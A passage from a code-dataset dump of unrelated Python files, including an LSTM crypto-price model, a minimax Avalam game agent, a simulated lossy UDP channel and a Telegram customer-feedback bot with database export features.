random.shuffle(sequential_data)\n\n # Balance Data (Price going up, Price going down)\n increasing = []\n decreasing = []\n\n for seq, target in sequential_data:\n if target == 1:\n increasing.append([seq, target])\n elif target == 0:\n decreasing.append([seq, target])\n \n random.shuffle(increasing)\n random.shuffle(decreasing)\n\n minimumLength = min(len(increasing), len(decreasing))\n increasing = increasing[:minimumLength]\n decreasing = decreasing[:minimumLength]\n\n sequential_data = increasing + decreasing\n random.shuffle(sequential_data)\n\n # Create inputs and outputs\n X = [] # inputs\n y = [] # outputs\n\n for seq, target in sequential_data:\n X.append(seq)\n y.append(target)\n\n return np.array(X), np.asarray(y)\n\n\ndf = createMainDf(FILE_TO_PREDICT)\ndf = addTargets(df)\ntrainDf, testDf = splitTrainAndTest(df)\n\ntrainX, trainY = getXandY(trainDf)\ntestX, testY = getXandY(testDf)\n\n# Build Model\nmodel = Sequential()\nmodel.add( LSTM(128, input_shape=(trainX.shape[1:]), activation='relu', return_sequences=True) )\n# model.add( CuDNNLSTM(128, input_shape=(xTrain.shape[1:]), return_sequences=True) ) If running with GPU\nmodel.add( Dropout(0.2) )\nmodel.add( BatchNormalization() )\n\nmodel.add( LSTM(128, activation='relu', return_sequences=False) )\n# model.add( CuDNNLSTM(128) ) If running with GPU\nmodel.add( Dropout(0.1) )\nmodel.add( BatchNormalization() )\n\nmodel.add( Dense(32, activation='relu') )\nmodel.add( Dropout(0.2) )\nmodel.add( BatchNormalization() )\n\nmodel.add( Dense(32, activation='relu') )\n\nmodel.add( Dense(2, activation='softmax') )\n\n# Hyper params\nopt = tf.keras.optimizers.Adam(lr=0.001, decay=1e-6)\n\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=opt,\n metrics=['accuracy'])\n\nmodel.fit(trainX, trainY, epochs=5, validation_data=(testX, testY))","sub_path":"tests/simpleBTC-LSTM.py","file_name":"simpleBTC-LSTM.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"275578307","text":"from django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_swagger.views import get_swagger_view\n\nfrom . import views\n\n\"\"\"\nView 클래스 대신 ViewSet 클래스를 사용했기때문에\nURL 설정할 필요가 없음.\nRouter를 사용하면 뷰코드와 뷰, URL이 자동 연결된다.\n나머지는 REST 프레임워크가 알아서 다 한다.\n\"\"\"\n\nrouter = routers.DefaultRouter()\nrouter.register(r'versions', views.VersionViewSet)\nrouter.register(r'signup', views.SignupViewSet)\nrouter.register(r'login', views.LoginViewSet)\nrouter.register(r'categorys', views.CategoryViewSet)\nrouter.register(r'post', views.PostModelViewSet)\nrouter.register(r'comment', views.CommentViewSet)\nrouter.register(r'change', views.ChangeWordViewSet)\n\nschema_view = get_swagger_view(title='TServer API')\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^docs$', schema_view),\n url(r'^api-v1/', include('rest_framework.urls', namespace='rest_framework_category')),\n]","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643510353","text":"#!/usr/bin/env python3\n\"\"\"\nAvalam agent.\nCopyright (C) 2015, <<<<<<<<<<< YOUR NAMES HERE >>>>>>>>>>>\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; version 2 of the License.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, see .\n\n\"\"\"\n\nimport avalam\nimport minimax\nimport random\nimport time\n\n\nclass Agent:\n \"\"\"This is the skeleton of an agent to play the Avalam game.\"\"\"\n\n def __init__(self, name=\"Basic_Agent\"):\n self.name = name\n self.best_for_step = [0] * 40\n\n def successors(self, state):\n \"\"\"The successors function must return (or yield) a list of\n pairs (a, s) in which a is the action played to reach the\n state s; s is the new state, i.e. a triplet (b, p, st) where\n b is the new board after the action a has been played,\n p is the player to play the next move and st is the next\n step number.\n \"\"\"\n (b, p, st) = state\n if st == 1:\n a = (3, 7, 3, 8)\n b2 = b.clone()\n b2.play_action(a)\n yield (a, (b2, -p, st + 1))\n return\n\n big_towers = self.get_big_towers(state)\n towers = self.get_towers_neighbors(state, big_towers, 2)\n # print(\"big_towers: step \" + str(st) + \" \" + str(big_towers))\n # print(\"towers \" + str(towers))\n for t in towers:\n (i, j) = t\n # print(\"t=\" + str(t))\n ta = b.get_tower_actions(i, j)\n for a in ta:\n # print(\"action : \" + str(a))\n if b.is_action_valid(a):\n b2 = b.clone()\n b2.play_action(a)\n yield (a, (b2, -p, st + 1))\n\n def cutoff(self, state, depth):\n \"\"\"The cutoff function returns true if the alpha-beta/minimax\n search has to stop; false otherwise.\n \"\"\"\n (b, p, st) = state\n time_left = self.time_left - (time.time() - self.time)\n\n max_depth = 3\n if st == 1 or (time_left is not None and (time_left < 150 - 150 // 40 * st or (\n time_left < 30 and st < 30) or time_left < 10)): # the final goes always really fast\n max_depth = 1\n\n if max_depth != self.max_depth:\n self.max_depth = max_depth\n print(max_depth)\n\n return depth > max_depth or b.is_finished()\n\n def evaluate(self, state):\n \"\"\"The evaluate function must return an integer value\n representing the utility function of the board.\n \"\"\"\n\n (b, p, st) = state\n # score = b.get_score()\n score = 0\n score2 = 0\n for t in b.get_towers():\n (i, j, h) = t\n if not b.is_tower_movable(i, j):\n if h > 0:\n score2 += 1\n else:\n score2 -= 1\n else:\n if h > 0:\n score += 1\n else:\n score -= 1\n\n tot_score = score + 3 * score2\n return tot_score\n\n def play(self, board, player, step, time_left):\n \"\"\"This function is used to play a move according\n to the board, player and time left provided as input.\n It must return an action representing the move the player\n will perform.\n \"\"\"\n self.player = player\n self.time_left = time_left\n self.time = time.time()\n self.max_depth = 0\n print(time_left)\n newBoard = avalam.Board(board.get_percepts(player == avalam.PLAYER2))\n state = (newBoard, player, step)\n return minimax.search(state, self)\n\n def get_big_towers(self, state):\n (b, p, st) = state\n towers = b.get_towers()\n if st == 1:\n j = 0\n for t in towers:\n j += 1\n if j > 3:\n break\n yield t\n else:\n for t in towers:\n (i, j, h) = t\n if abs(h) > 1:\n yield t\n\n def get_towers_neighbors(self, state, towers, max_dist):\n (board, p, st) = state\n consider_tower = []\n dir = [0]\n for i in range(1, max_dist + 1):\n dir.append(i)\n dir.append(-i)\n for t in towers: # check around each tower\n (i, j, h) = t\n for a in range(len(dir)):\n for b in range(len(dir)):\n # print (str((i+a,j+b))+\" in_towers:\"+str(self.is_in_towers((i + a, j + b), board))+\" not_in_consid:\" + str((i + a, j + b) not in consider_tower))\n if is_in_towers((i + dir[a], j + dir[b]), board) and (\n i + dir[a], j + dir[b]) not in consider_tower:\n consider_tower.append((i + dir[a], j + dir[b]))\n # print(\"consider: \" + str(consider_tower))\n random.shuffle(consider_tower)\n return consider_tower\n\n\ndef is_in_towers(tower, board):\n \"\"\"\n :param tower: (i,j) tower\n :param towers: [ (i,j,h) , (i,j,h) , ...]\n :return: True if (tower, ?) in towers\n \"\"\"\n towers = board.get_towers()\n (i2, j2) = tower\n # print(\"tower : \"+str(tower)+\" all_towers:\"+str(towers))\n for t in towers:\n (i, j, h) = t\n if i == i2 and j == j2:\n return True\n return False\n\n\n#if __name__ == \"__main__\":\n # avalam.agent_main(Agent())\n\n","sub_path":"IAProjects/Projet3/AvalamFramework/super_agent.py","file_name":"super_agent.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115240361","text":"\"\"\"\n1292. Odd Even Linked List\nGiven a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are talking about the node number and not the value in the nodes.\n\n样例\nExample:\nGiven 1->2->3->4->5->NULL,\nreturn 1->3->5->2->4->NULL.\n\"\"\"\n\n\n# Definition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param head: a singly linked list\n @return: Modified linked list\n \"\"\"\n # time:984 ms\n def oddEvenList(self, head):\n # write your code here\n odd = ListNode(-1)\n odd_cur = odd\n even = ListNode(-1)\n even_cur = even\n count = 1\n while head:\n if count % 2 == 1:\n odd_cur.next = ListNode(head.val)\n odd_cur = odd_cur.next\n else:\n even_cur.next = ListNode(head.val)\n even_cur = even_cur.next\n count += 1\n head = head.next\n odd_cur.next = even_cur.next\n return odd.next\n\n\na5 = ListNode(5, )\na4 = ListNode(4, a5)\na3 = ListNode(3, a4)\na2 = ListNode(2, a3)\na1 = ListNode(1, a2)\ns =Solution()\nprint(s.oddEvenList(a1))","sub_path":"数据结构 - 线性结构/链表/1292.Odd Even Linked List.py","file_name":"1292.Odd Even Linked List.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115074209","text":"from django.conf import settings\n\nfrom utils.mail import mail\n\n\ndef notify_tenders(sender, instance, **kwargs):\n from apps.scheduling.models import Event, MailTemplate\n\n mail_template = None\n\n if instance.pk is None:\n if not instance.is_closed:\n mail_template = \"enrollopen\"\n else:\n orig = Event.objects.get(pk=instance.pk)\n if orig.is_closed and not instance.is_closed:\n mail_template = \"enrollopen\"\n elif not orig.is_closed and instance.is_closed:\n mail_template = \"enrollclosed\"\n\n if mail_template:\n try:\n mt = MailTemplate.objects.get(organization=instance.organizer, name=mail_template)\n if mt.is_active:\n members = instance.organizer.membership_set.filter(is_tender=True, is_active=True) \\\n .exclude(user__email=\"\")\n addressees = [m.user for m in members]\n mail(settings.EMAIL_FROM, addressees, mt.subject, mt.template, extraattrs={'event': instance})\n except MailTemplate.DoesNotExist:\n pass\n","sub_path":"apps/scheduling/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343797821","text":"import copy\nimport json\nimport queue\nimport random\nimport socket\nimport threading\n\nfrom network.packet import MAX_FIELD_VALUE\nfrom network.packet import Packet\n\n\nclass UnreliableDataTransfer:\n\n def __init__(self, source_addr, destination_addr, loss_probability=0.15, error_probability=0.2):\n if not (0 <= loss_probability <= 1):\n raise Exception(\"The loss probability must be a value between 0 and 1\")\n if not (0 <= error_probability <= 1):\n raise Exception(\"The error probability must be a value between 0 and 1\")\n\n self.loss_probability = loss_probability\n self.error_probability = error_probability\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.socket.bind(source_addr)\n self.destination_addr = destination_addr\n self.receive_queue = queue.Queue()\n self.listener = threading.Thread(name=f\"udt-{source_addr}\", target=self.listen, daemon=True)\n self.listener.start()\n\n def send(self, packet):\n if not isinstance(packet, Packet):\n raise Exception(f\"udt_send expects a Packet as parameter, but received a {type(packet)}\")\n\n if len(packet) == 0:\n raise Exception(f\"udt_send received an empty Packet\")\n\n print(\"Transmitting a packet over the unreliable channel\")\n packet = copy.deepcopy(packet)\n\n if random.uniform(0, 1) >= self.loss_probability:\n if random.uniform(0, 1) < self.error_probability:\n field = random.choice(packet.get_available_fields())\n value = packet.get_field(field)\n value += random.randint(0, MAX_FIELD_VALUE - value)\n packet.set_field(field, value)\n bytes_to_send = json.dumps(packet.data).encode()\n self.socket.sendto(bytes_to_send, self.destination_addr)\n\n def receive(self, timeout=0):\n try:\n return self.receive_queue.get(timeout=timeout)\n except queue.Empty:\n return None\n\n def listen(self):\n while True:\n data, _ = self.socket.recvfrom(1500)\n print(\"Received a packet from the unreliable channel\")\n packet = Packet(json.loads(data.decode()))\n self.receive_queue.put(packet)\n","sub_path":"network/unreliable.py","file_name":"unreliable.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"142148691","text":"\"\"\"Contains a class for handling reading and storing of \nglobal preferences such as the previous experiment and \nthe tab settings. Normally saved to ~/.meggieprefs.\n\"\"\"\n\nimport os\nimport configparser\n\nfrom meggie.utilities.filemanager import homepath\n\n\nclass PreferencesHandler(object):\n \"\"\" Class for storing and setting preferences.\n \"\"\"\n\n def __init__(self):\n self.prefs_path = \"\"\n self.workspace = \"\"\n self.previous_experiment_name = \"\"\n self.auto_load_last_open_experiment = False\n self.save_bads = False\n self.read_preferences_from_disk()\n\n def write_preferences_to_disk(self):\n \"\"\"Writes the preferences to file system, in INI style.\n \"\"\"\n config = configparser.RawConfigParser()\n config.add_section('MiscOptions')\n config.add_section('Workspace')\n config.add_section('EnvVariables')\n config.add_section('Tabs')\n\n # Sanity of these values is assumed to be checked by the calling method\n config.set('MiscOptions', 'previousExperimentName',\n self.previous_experiment_name)\n config.set('Workspace', 'workspaceDir', self.workspace)\n\n if self.auto_load_last_open_experiment:\n config.set('MiscOptions', 'autoReloadPreviousExperiment', 'True')\n else:\n config.set('MiscOptions', 'autoReloadPreviousExperiment', 'False')\n\n if self.save_bads:\n config.set('MiscOptions', 'saveBads', 'True')\n else:\n config.set('MiscOptions', 'saveBads', 'False')\n\n config.set('Tabs', 'enabledTabs', ','.join(self.enabled_tabs or []))\n config.set('Tabs', 'preset', self.tab_preset)\n\n path = self.prefs_path\n if not path:\n path = os.path.join(homepath(), '.meggieprefs')\n\n with open(path, 'w') as configfile:\n config.write(configfile)\n\n def read_preferences_from_disk(self):\n \"\"\"Reads the preferences from file system into attributes.\n \"\"\"\n filename = os.path.join(homepath(), '.meggieprefs')\n if os.path.isfile(filename):\n config = configparser.RawConfigParser()\n config.read(filename)\n\n try:\n self.workspace = config.get('Workspace', 'workspaceDir')\n except Exception as exc:\n self.workspace = ''\n\n try:\n if config.get('MiscOptions',\n 'autoreloadpreviousexperiment') == 'True':\n self.auto_load_last_open_experiment = True\n else:\n self.auto_load_last_open_experiment = False\n except Exception as exc:\n self.auto_load_last_open_experiment = False\n\n try:\n self.previous_experiment_name = config.get(\n 'MiscOptions', 'previousExperimentName')\n except Exception as exc:\n self.previous_experiment_name = ''\n\n try:\n self.enabled_tabs = config.get('Tabs', 'enabledTabs')\n self.enabled_tabs = self.enabled_tabs.split(',')\n except Exception as exc:\n self.enabled_tabs = ''\n try:\n self.tab_preset = config.get('Tabs', 'preset')\n except Exception as exc:\n self.tab_preset = ''\n\n","sub_path":"meggie/mainwindow/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417635857","text":"import datetime as dt\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\nimport pandas as pd\r\nimport pandas_datareader.data as web\r\nfrom mpl_finance import candlestick_ohlc\r\nimport matplotlib.dates as mdates\r\n\r\nstyle.use(['ggplot','dark_background'])\r\n# set up the style of the plot\r\n\r\nstart = dt.datetime(2015, 10, 10)\r\nend = dt.datetime.now()\r\nsource= 'yahoo'\r\nticker = 'TSLA'\r\n# set up the pandas_datareader\r\n\r\ndf = web.DataReader(ticker, source, start, end)\r\n# downloads the historical price\r\n\r\n\r\ndf['50ma'] = df['Close'].ewm(span=50, adjust=False).mean()\r\ndf['100ma'] = df['Close'].ewm(span=100, adjust=False).mean()\r\ndf['1000ma'] = df['Close'].ewm(span=1000, adjust=False).mean()\r\n# computes the moving average\r\n\r\ndf = df[df.index > '2015-1-1']\r\n\r\n\r\ndf['Date'] = df.index.map(mdates.date2num)\r\nohlc = df[['Date','Open','High','Low','Close']]\r\n# converted date format for ohlc to run\r\n\r\nf1, ax = plt.subplots(figsize = (50,10))\r\n# sets the size of the graph\r\n\r\ncandlestick_ohlc(ax, ohlc.values, width= .6, colorup='green', colordown='red')\r\nax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m'))\r\n# plotting the candlesticks\r\n\r\n\r\nax.plot(df.index, df['50ma'], color = 'white', label = '50ma')\r\nax.plot(df.index, df['100ma'], color = 'orange', label = '100ma')\r\nax.plot(df.index, df['1000ma'], color = 'blue', label = '1000ma')\r\n# plots the moving average lines\r\n\r\n\r\nax.grid(True)\r\nax.legend()\r\n\r\nplt.show()\r\n\r\n","sub_path":"Candlestick.py","file_name":"Candlestick.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"56746862","text":"import asyncio\nimport logging\nimport typing\n\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom aiogram.utils import callback_data, exceptions\n\nfrom config import API_TOKEN, DB_HOST, DB_NAME, DB_PASS, DB_PORT, DB_USER, admin_id\nfrom db_module import DB_module\nfrom poll_module import get_text_from, get_next_question \nfrom analysis_module import get_analysis\n\n\n# Data base\nDB = DB_module(DB_HOST, DB_NAME, DB_USER, DB_PASS, DB_PORT)\n\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger('messages_sender')\n\n# Initialize bot and dispatcher\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n# sructure of callback bottons \nbutton_cb = callback_data.CallbackData('button', 'question_name', 'answer', 'data')\n\n\nlike_word = 'Нравится'\nlike_mark = 2\ndislike_word = 'Не нравится'\ndislike_mark = 1\nlike_dislike_list = ['Нравится', 'Не нравится']\nlike_list = ['Нравится 👍', 'Не нравится']\ndislike_list = ['Нравится', 'Не нравится 👎']\n\nkeywords_day = ['Меню позавчера', \n 'Меню вчера', \n 'Меню сегодня']\nloyaltyMark_word = 'Оценить работу компании' \nbasemenu_list = keywords_day + [loyaltyMark_word,]\n\nwho_should_send_menu = {}\n\n\n\ndef make_keyboard(question_name, answers, data = 0):\n \"\"\" Возвращает клавиатуру \"\"\"\n if not answers: return None\n\n keyboard = types.InlineKeyboardMarkup()\n row = []\n for answer in answers: # make a botton for every answer \n cb_data=button_cb.new(question_name = question_name,\n answer = answer,\n data = data)\n row.append(types.InlineKeyboardButton(answer,\n callback_data=cb_data))\n if len(row) <= 2: keyboard.row(*row)\n elif len(row) == 10:\n keyboard.row(*row[:5])\n keyboard.row(*row[5:])\n else:\n for button in row: keyboard.row(button)\n \n return keyboard\n\n\ndef get_basemenu_keyboard():\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n for name in basemenu_list: keyboard.add(types.KeyboardButton(name))\n return keyboard\n \ndef check_low_answers(user_id):\n answer = DB.get_last_answer(user_id = user_id)\n for name in ['loyalty', 'manager', 'delivery', 'cooking', 'dietetics']:\n if int(answer[name]) < 7: return True\n return False\n\n\n@dp.message_handler(commands=['start'])\nasync def send_phone(message: types.Message):\n logging.info('start command from: %r', message.from_user.id) \n \n DB.add_user(message.from_user.id, \n message.from_user.first_name, \n message.from_user.last_name, \n message.from_user.username, \n message.from_user.language_code)\n\n keyboard = types.ReplyKeyboardMarkup(one_time_keyboard=True, \n resize_keyboard=True)\n keyboard.add(types.KeyboardButton('Отправить телефон 📞', \n request_contact=True))\n text = get_text_from('./text_of_questions/authorization.txt')\n await message.answer(text, reply_markup = keyboard)\n\n\n@dp.message_handler(commands=['help'])\nasync def send_help(message: types.Message):\n logging.info('help command from: %r', message.from_user.id) \n keyboard = get_basemenu_keyboard()\n await message.answer(get_text_from('./text_of_questions/help.txt'), \n reply_markup=keyboard)\n\n\n@dp.callback_query_handler(button_cb.filter(\n question_name=['start', 'loyalty', 'manager', 'delivery', 'cooking', 'dietetics']))\nasync def callback_vote_action(\n query: types.CallbackQuery, callback_data: typing.Dict[str, str]):\n \n # callback_data contains all info from callback data\n logging.info('Got this callback data: %r', callback_data) \n \n await query.answer() # don't forget to answer callback query as soon as possible\n callback_question = callback_data['question_name']\n callback_answer = callback_data['answer']\n \n DB.add_answer(user_id = query.from_user.id, \n question_name = callback_question, \n answer = callback_answer)\n \n question_name, text, answers = get_next_question(callback_question,\n callback_answer)\n keyboard = make_keyboard(question_name, answers)\n \n edited_text = query.message.text + '\\n\\nВаша оценка: ' + callback_answer\n\n await bot.edit_message_text(\n edited_text,\n query.from_user.id,\n query.message.message_id,\n reply_markup=None,\n )\n \n await bot.send_message(query.from_user.id, text, reply_markup = keyboard)\n \n if question_name == 'end':\n if check_low_answers(query.from_user.id):\n await bot.send_message( \n query.from_user.id, \n 'Расскажите, почему вы поставили низкую оценку?')\n else:\n await bot.send_message( \n query.from_user.id, \n 'Вы так-же можете оставить тут свой отзыв.')\n\n\n \nasync def send_menu(user_id, keyword_day):\n \"\"\" \n Клиент выбрал день. \n Бот отправляет меню - список блюд с лайками/дизлайками\n \n \"\"\"\n menu = DB.get_menu(keyword=keyword_day)\n if not menu:\n await bot.send_message(user_id, 'Извините, меню на этот день отсутствует')\n return\n \n dishes = DB.get_dish(menu_id=menu['id'])\n \n await bot.send_message(user_id, '📅 Меню на '+str(menu['date'])+':')\n \n for dish in dishes:\n feedback = DB.get_feedback(user_id = user_id, dish_id = dish['id'])\n if not feedback:\n list_for_keybord = like_dislike_list\n elif feedback['mark'] == 2:\n list_for_keybord = like_list\n elif feedback['mark'] == 1:\n list_for_keybord = dislike_list\n else:\n list_for_keybord = like_dislike_list\n \n keyboard = make_keyboard('feedback', \n list_for_keybord, \n dish['id'])\n await bot.send_message(user_id, dish['name'], reply_markup = keyboard)\n \n \n@dp.callback_query_handler(button_cb.filter(question_name=['feedback']))\nasync def callback_like(query: types.CallbackQuery, \n callback_data: typing.Dict[str, str]):\n \"\"\" Клиент поставил лайк под блюдом. \"\"\"\n # callback_data contains all info from callback data\n logging.info('Got this callback data: %r', callback_data) \n \n await query.answer() # don't forget to answer callback query as soon as possible\n from_user = query.from_user.id\n callback_question = callback_data['question_name']\n callback_answer = callback_data['answer']\n callback_ans_data = callback_data['data']\n \n if not callback_answer in like_dislike_list: return\n \n if callback_answer == like_word:\n mark_from_user = like_mark\n list_for_keyboard = like_list\n elif callback_answer == dislike_word:\n mark_from_user = dislike_mark\n list_for_keyboard = dislike_list \n \n DB.update_feedback(user_id = from_user, \n dish_id = callback_ans_data, \n mark = mark_from_user) \n \n keyboard = make_keyboard(callback_question, \n list_for_keyboard, \n callback_ans_data )\n\n await bot.edit_message_text(query.message.text,\n query.from_user.id,\n query.message.message_id,\n reply_markup=keyboard )\n \n\n@dp.message_handler(commands=['admin'])\nasync def admin_options(message: types.Message):\n logging.info('admin command from: %r', message.from_user.id) \n \n if message.from_user.id in admin_id:\n question_name, text, answers = get_next_question('admin_options')\n keyboard = make_keyboard(question_name, answers)\n else: \n text = 'У вас нет доступа'\n keyboard = None\n \n await message.answer(text, reply_markup = keyboard)\n\n\n@dp.callback_query_handler(button_cb.filter(question_name=['admin']))\nasync def callback_admin_action(\n query: types.CallbackQuery, callback_data: typing.Dict[str, str]):\n \n # callback_data contains all info from callback data\n logging.info('Got this callback data: %r', callback_data) \n \n await query.answer() # don't forget to answer callback query as soon as possible\n callback_question = callback_data['question_name']\n callback_answer = callback_data['answer']\n \n question_name, text, answers = get_next_question(callback_question,\n callback_answer)\n keyboard = make_keyboard(question_name, answers)\n \n await bot.send_message(query.from_user.id, text, reply_markup = keyboard)\n \n if question_name == 'table_loyalty':\n headings = ['id', 'Имя','Фамилия','username','язык','номер телефона',\n 'id','id', 'дата ответа', 'лояльность', 'менеджер', \n 'доставка', 'кулинария', 'диетология', 'отзыв']\n filepath = 'smartfood_all_answers.xls'\n DB.export_answer_loyalty_to_excel(headings, filepath)\n document = open(filepath,'rb')\n await bot.send_document(query.from_user.id, document)\n \n elif question_name == 'analysis':\n text = get_analysis(DB.get_answers())\n await bot.send_message(query.from_user.id, text)\n \n elif question_name == 'table_menu_fb':\n headings =['Имя', 'Фамилия', 'username', 'номер телефон', \n 'название блюда', 'дата меню', 'дата отзыва', \n 'отметка (2-нравится, 1-не нравится)', 'отзыв'] \n filepath = 'smartfood_menu_feedback.xls'\n DB.export_menu_feedback_to_excel(headings, filepath)\n document = open(filepath,'rb')\n await bot.send_document(query.from_user.id, document)\n \n elif question_name == 'add_new_menu':\n who_should_send_menu[query.from_user.id] = True\n \n text = get_text_from('./text_of_questions/menu_exemple.txt')\n await bot.send_message(query.from_user.id, text)\n \n elif question_name == 'stop_add':\n who_should_send_menu[query.from_user.id] = False\n \n\n \n \n \n@dp.message_handler(lambda message: message.text in basemenu_list)\nasync def base_menu(message: types.Message):\n \"\"\"\n Получаем нажатие кнопки из базового меню\n Запускаем соответствующие процесс:\n Оценка меню\n Оценка компании\n \"\"\"\n logging.info('push basemenu button from: %r', message.from_user.id)\n if message.text in keywords_day:\n await message.answer(get_text_from('./text_of_questions/menu_instruction.txt'))\n await send_menu(message.from_user.id, message.text)\n elif message.text == loyaltyMark_word:\n await message.answer(get_text_from('./text_of_questions/start_poll.txt'))\n question_name, text, answers = get_next_question('start_poll')\n keyboard = make_keyboard(question_name, answers)\n await message.answer(text, reply_markup = keyboard )\n \n return \n\ndef parse_message(text):\n message_list = text.split('\\n')\n try:\n menu_id = DB.add_menu(str_date = message_list[0])\n if not menu_id: \n return 'Ошибка. Можно добавлять меню только на будущие дни'\n \n for i in range(1,len(message_list)):\n if message_list[i]!='':\n DB.add_dish(menu_id, message_list[i])\n return f'Новое меню на {message_list[0]} добавлено.'\n except:\n return 'Ошибка. Не удалось добавить это меню'\n\n\n@dp.message_handler(content_types = types.message.ContentType.TEXT)\nasync def new_text_message(message: types.Message):\n \"\"\"\n Принимает текстовые сообщения\n Если это ответет на сообщение с блюдом, то записывается отзыв на блюдо\n Иначе просто какой-то отзыв \n \"\"\"\n newmessage_is_simple_review = True\n if 'reply_to_message' in message:\n reply_to_message = message.reply_to_message\n if 'reply_markup' in reply_to_message:\n newmessage_is_simple_review = False\n inline_keyboard = reply_to_message.reply_markup.inline_keyboard\n dish_id_str = inline_keyboard[0][0].callback_data.split(':')[-1]\n DB.update_feedback(user_id = message.from_user.id, \n dish_id = int(dish_id_str), \n review = message.text) \n logging.info('new review from: %r', message.from_user.id)\n await message.reply('Я передам ваш отзыв. Спасибо!')\n \n elif message.from_user.id in who_should_send_menu:\n if who_should_send_menu[message.from_user.id]:\n newmessage_is_simple_review = False\n text = parse_message(message.text)\n await message.reply(text)\n \n if newmessage_is_simple_review:\n logging.info('new message from: %r', message.from_user.id) \n DB.add_review(user_id = message.from_user.id, text = message.text)\n keyboard = get_basemenu_keyboard()\n await message.reply('Я передам эту информацию руководству компании. Спасибо!',\n reply_markup=keyboard)\n \n\n@dp.message_handler(content_types = types.message.ContentType.CONTACT)\nasync def new_contact(message: types.Message):\n \"\"\"\n Если приходит контакт, то записываем как новый номер юзера\n И отправляем help и базавое меню\n \n \"\"\"\n logging.info('new phone from: %r', message.from_user.id) \n DB.add_phone(user_id = message.from_user.id, \n phone = message.contact.phone_number)\n await message.reply(get_text_from('./text_of_questions/phone.txt'),\n reply_markup = types.ReplyKeyboardRemove())\n \n text = get_text_from('./text_of_questions/first_instruction.txt')\n keyboard = get_basemenu_keyboard()\n await message.answer(text, reply_markup = keyboard)\n\n\n@dp.message_handler(content_types = types.message.ContentType.ANY)\nasync def staf(message: types.Message):\n \"\"\" любой другой контент просто отметаем\"\"\"\n logging.info('strange staf from: %r', message.from_user.id)\n await message.reply(get_text_from('./text_of_questions/wtf.txt'))\n\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=False)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"321588826","text":"from __future__ import division\nfrom six.moves.builtins import range\nimport datetime\n\nfrom schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC, SCHEDULER_PREVNEXT_LIMIT_SECONDS\n\n\nfrom schedule.templatetags.scheduletags import register\n\n@register.inclusion_tag(\"schedule/_daily_table.html\", takes_context=True)\ndef daily_table(context, day, start=1, end=24, increment=60):\n \"\"\"\n Display a nice table with occurrences and action buttons.\n Arguments:\n start - hour at which the day starts\n end - hour at which the day ends\n increment - size of a time slot (in minutes)\n \"\"\"\n user = context['request'].user\n addable = CHECK_EVENT_PERM_FUNC(None, user)\n if 'calendar' in context:\n addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)\n context['addable'] = addable\n\n day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))\n # get slots to display on the left\n slots = _cook_slots(day_part, increment)\n context['slots'] = slots\n return context\n\n\ndef _cook_slots(period, increment):\n \"\"\"\n Prepare slots to be displayed on the left hand side\n calculate dimensions (in px) for each slot.\n Arguments:\n period - time period for the whole series\n increment - slot size in minutes\n \"\"\"\n tdiff = datetime.timedelta(minutes=increment)\n if (period.end - period.start).seconds:\n num = (period.end - period.start).seconds // tdiff.seconds\n else:\n num = 24 # hours in a day\n s = period.start\n slots = []\n for i in range(num):\n sl = period.get_time_slot(s, s + tdiff)\n slots.append(sl)\n s = s + tdiff\n return slots\n","sub_path":"templatetags/templatetags/scheduletags.py","file_name":"scheduletags.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260683053","text":"import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.tree import DecisionTreeClassifier,plot_tree \r\nfrom sklearn.model_selection import train_test_split \r\nfrom sklearn.metrics import confusion_matrix, 